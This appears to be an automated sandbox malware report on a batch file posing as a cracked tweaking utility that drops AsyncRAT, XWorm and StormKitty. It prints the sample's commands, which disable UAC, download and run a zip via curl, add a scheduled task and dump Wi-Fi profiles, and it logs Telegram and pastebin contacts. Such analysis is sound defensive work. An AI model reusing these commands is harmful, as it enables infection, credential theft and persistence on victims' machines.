Malware Analysis Report

2025-01-03 06:16

Sample ID 241124-ytw56asqgn
Target EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
SHA256 16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca
Tags
asyncrat stormkitty xworm default discovery evasion execution persistence privilege_escalation rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca

Threat Level: Known bad

The file EXM_Premium_Tweaking_Utility_1.0_Cracked.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat stormkitty xworm default discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Detect Xworm Payload

AsyncRat

Asyncrat family

UAC bypass

StormKitty payload

Stormkitty family

Xworm family

Xworm

StormKitty

Async RAT payload

Reads user/profile data of web browsers

Checks computer location settings

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Drops desktop.ini file(s)

Looks up geolocation information via web service

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 20:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 20:05

Reported

2024-11-24 20:06

Platform

win10v2004-20241007-en

Max time kernel

67s

Max time network

67s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\exm\EXMservice.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk C:\Users\Admin\msedge.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk C:\Users\Admin\msedge.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\exm\EXMservice.exe N/A
N/A N/A C:\Users\Admin\msedge.exe N/A
N/A N/A C:\Users\Admin\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\svchost.exe N/A
File created C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A icanhazip.com N/A N/A

Looks up geolocation information via web service

Browser Information Discovery

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\svchost.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\msedge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1492 wrote to memory of 3096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1492 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2988 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2988 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2988 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1492 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 5044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1492 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1492 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\exm\EXMservice.exe
PID 1492 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\exm\EXMservice.exe
PID 3928 wrote to memory of 1412 N/A C:\exm\EXMservice.exe C:\Users\Admin\msedge.exe
PID 3928 wrote to memory of 1412 N/A C:\exm\EXMservice.exe C:\Users\Admin\msedge.exe
PID 3928 wrote to memory of 1872 N/A C:\exm\EXMservice.exe C:\Users\Admin\svchost.exe
PID 3928 wrote to memory of 1872 N/A C:\exm\EXMservice.exe C:\Users\Admin\svchost.exe
PID 3928 wrote to memory of 1872 N/A C:\exm\EXMservice.exe C:\Users\Admin\svchost.exe
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1412 wrote to memory of 4732 N/A C:\Users\Admin\msedge.exe C:\Windows\System32\schtasks.exe
PID 1412 wrote to memory of 4732 N/A C:\Users\Admin\msedge.exe C:\Windows\System32\schtasks.exe
PID 1872 wrote to memory of 2524 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2524 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2524 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2524 wrote to memory of 5000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2524 wrote to memory of 5000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2524 wrote to memory of 5000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2524 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2524 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2524 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2524 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2524 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2524 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1872 wrote to memory of 5064 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5064 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5064 N/A C:\Users\Admin\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 5064 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5064 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5064 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5064 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5064 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5064 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1492 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1492 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"

C:\Windows\system32\reg.exe

Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f

C:\Windows\system32\reg.exe

Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'

C:\Windows\system32\reg.exe

Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_UserAccount where name="Admin" get sid

C:\Windows\system32\findstr.exe

findstr "S-"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\system32\curl.exe

curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'

C:\exm\EXMservice.exe

EXMservice.exe

C:\Users\Admin\msedge.exe

"C:\Users\Admin\msedge.exe"

C:\Users\Admin\svchost.exe

"C:\Users\Admin\svchost.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('ONLY DO THESE ON ETHERNET, WIFI TWEAKS COMING IN 1.0', 'Exm Tweaking Utility', 'Ok', [System.Windows.Forms.MessageBoxIcon]::Information);}"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

timeout 2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.185.241:80 icanhazip.com tcp
US 8.8.8.8:53 api.mylnikov.org udp
US 172.67.196.114:443 api.mylnikov.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 241.185.16.104.in-addr.arpa udp
US 8.8.8.8:53 114.196.67.172.in-addr.arpa udp
N/A 127.0.0.1:6606 tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:7707 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:7707 tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:8808 tcp

Files

memory/1340-0-0x00007FFD2F563000-0x00007FFD2F565000-memory.dmp

memory/1340-1-0x000001E87FC70000-0x000001E87FC92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ikyrx0pw.2wy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1340-11-0x00007FFD2F560000-0x00007FFD30021000-memory.dmp

memory/1340-12-0x00007FFD2F560000-0x00007FFD30021000-memory.dmp

memory/1340-15-0x00007FFD2F560000-0x00007FFD30021000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/4780-28-0x000002255AAD0000-0x000002255AAE2000-memory.dmp

memory/4780-29-0x00000225585A0000-0x00000225585AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\exm.zip

MD5 57a6527690625bea4e4f668e7db6b2aa
SHA1 c5799fd94999d128203e81e22c6d9fdb86e167ee
SHA256 076e01b09f9c5cccc273b2f7dfa1a1efccc1a8e8ebf98a7eee756024b93bad17
SHA512 d86c7f79989eb0781e15f8631048506ffab338f933ddfedbcc2c7464447770beaf21b7ed3cba2ebb97be5ffdc9a450f2df2e2313efaeb8e8101f2ee53c066e4e

C:\exm\EXMservice.exe

MD5 aab9c36b98e2aeff996b3b38db070527
SHA1 4c2910e1e9b643f16269a2e59e3ada80fa70e5fa
SHA256 c148cc14f15b71a2d3f5e6bce6b706744f6b373a7e6c090c14f46f81d2d6e82f
SHA512 0db75756a041a7cda6b384718581aaf11e6873614465dd56e81f17ad171cffe380e288a3c2ee540222190392904921f26df8a1d66d4108051c60fc8e5b2df779

memory/3928-71-0x0000000000780000-0x00000000007E6000-memory.dmp

C:\Users\Admin\msedge.exe

MD5 f1c2525da4f545e783535c2875962c13
SHA1 92bf515741775fac22690efc0e400f6997eba735
SHA256 9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f
SHA512 56308ac106caa84798925661406a25047df8d90e4b65b587b261010293587938fa922fbb2cfdedfe71139e16bfcf38e54bb31cbcc00cd244db15d756459b6133

C:\Users\Admin\svchost.exe

MD5 1bea6c3f126cf5446f134d0926705cee
SHA1 02c49933d0c2cc068402a93578d4768745490d58
SHA256 1d69b5b87c4cd1251c5c94461a455659febb683eab0ebd97dd30da2319ffc638
